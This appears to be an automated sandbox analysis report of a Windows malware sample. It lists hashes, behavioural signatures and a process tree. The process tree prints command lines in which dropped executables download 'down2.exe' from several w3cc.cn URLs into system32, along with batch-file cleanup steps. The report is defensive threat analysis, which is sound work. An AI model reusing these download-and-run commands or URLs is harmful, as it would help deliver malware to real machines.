Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29/02/2024, 06:45
Static task
static1
Behavioral task
behavioral1
Sample
adf042c909d919ccca72d1bcf7338e71.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
adf042c909d919ccca72d1bcf7338e71.exe
Resource
win10v2004-20240226-en
General
-
Target
adf042c909d919ccca72d1bcf7338e71.exe
-
Size
175KB
-
MD5
adf042c909d919ccca72d1bcf7338e71
-
SHA1
bf9be4f139b3742d94593f3079f1f8836e5f5bb4
-
SHA256
71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
-
SHA512
d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
-
SSDEEP
3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1
Malware Config
Signatures
-
resource yara_rule behavioral2/files/0x000900000002321a-12.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation adf042c909d919ccca72d1bcf7338e71.exe -
Executes dropped EXE 5 IoCs
pid Process 3060 SOupMF.exe 3096 DMWgpy.exe 3884 xBjOcu.exe 3108 RMsoSA.exe 5104 eytYFB.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\SysWOW64\DMWgpy.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\xBjOcu.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\RMsoSA.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\DelCAD.bat DMWgpy.exe File created C:\Windows\SysWOW64\eytYFB.exe.tmp adf042c909d919ccca72d1bcf7338e71.exe File created C:\Windows\SysWOW64\DelCAD.bat xBjOcu.exe File created C:\Windows\SysWOW64\SOupMF.exe adf042c909d919ccca72d1bcf7338e71.exe File opened for modification C:\Windows\SysWOW64\SOupMF.exe adf042c909d919ccca72d1bcf7338e71.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 400 PING.EXE 1928 PING.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2700 wrote to memory of 3060 2700 adf042c909d919ccca72d1bcf7338e71.exe 87 PID 2700 wrote to memory of 3060 2700 adf042c909d919ccca72d1bcf7338e71.exe 87 PID 2700 wrote to memory of 3060 2700 adf042c909d919ccca72d1bcf7338e71.exe 87 PID 2700 wrote to memory of 3096 2700 adf042c909d919ccca72d1bcf7338e71.exe 88 PID 2700 wrote to memory of 3096 2700 adf042c909d919ccca72d1bcf7338e71.exe 88 PID 2700 wrote to memory of 3096 2700 adf042c909d919ccca72d1bcf7338e71.exe 88 PID 2700 wrote to memory of 3884 2700 adf042c909d919ccca72d1bcf7338e71.exe 97 PID 2700 wrote to memory of 3884 2700 adf042c909d919ccca72d1bcf7338e71.exe 97 PID 2700 wrote to memory of 3884 2700 adf042c909d919ccca72d1bcf7338e71.exe 97 PID 2700 wrote to memory of 3108 2700 adf042c909d919ccca72d1bcf7338e71.exe 98 PID 2700 wrote to memory of 3108 2700 adf042c909d919ccca72d1bcf7338e71.exe 98 PID 2700 wrote to memory of 3108 2700 adf042c909d919ccca72d1bcf7338e71.exe 98 PID 3096 wrote to memory of 4372 3096 DMWgpy.exe 99 PID 3096 wrote to memory of 4372 3096 DMWgpy.exe 99 PID 3096 wrote to memory of 4372 3096 DMWgpy.exe 99 PID 4372 wrote to memory of 400 4372 cmd.exe 101 PID 4372 wrote to memory of 400 4372 cmd.exe 101 PID 4372 wrote to memory of 400 4372 cmd.exe 101 PID 2700 wrote to memory of 5104 2700 adf042c909d919ccca72d1bcf7338e71.exe 102 PID 2700 wrote to memory of 5104 2700 adf042c909d919ccca72d1bcf7338e71.exe 102 PID 2700 wrote to memory of 5104 2700 adf042c909d919ccca72d1bcf7338e71.exe 102 PID 3884 wrote to memory of 2060 3884 xBjOcu.exe 103 PID 3884 wrote to memory of 2060 3884 xBjOcu.exe 103 PID 3884 wrote to memory of 2060 3884 xBjOcu.exe 103 PID 2060 wrote to memory of 1928 2060 cmd.exe 105 PID 2060 wrote to memory of 1928 2060 cmd.exe 105 PID 2060 wrote to memory of 1928 2060 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\SOupMF.exe"C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll2⤵
- Executes dropped EXE
PID:3060
-
-
C:\Windows\SysWOW64\DMWgpy.exe"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:400
-
-
-
-
C:\Windows\SysWOW64\xBjOcu.exe"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
PID:1928
-
-
-
-
C:\Windows\SysWOW64\RMsoSA.exe"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
PID:3108
-
-
C:\Windows\SysWOW64\eytYFB.exe"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe2⤵
- Executes dropped EXE
PID:5104
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD578cd588e48bf05f83ac4d2e5bd3d32e2
SHA1c96060325a397b397a1d60076ce6e2c11f309a4f
SHA2565309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA5128cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65
-
Filesize
141B
MD5544926ed36528740dfc1d64a602e6d5c
SHA17837ae9e7da6054b79b1f1cbe810d838ed0ee3c5
SHA2566e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7
SHA5128425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b
-
Filesize
141B
MD59c439a87b83755cde8511cf65e13e54e
SHA1a72df147498f15d16d4004f73733d2602390e981
SHA256d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3
SHA512c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb
-
Filesize
175KB
MD5adf042c909d919ccca72d1bcf7338e71
SHA1bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA25671580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173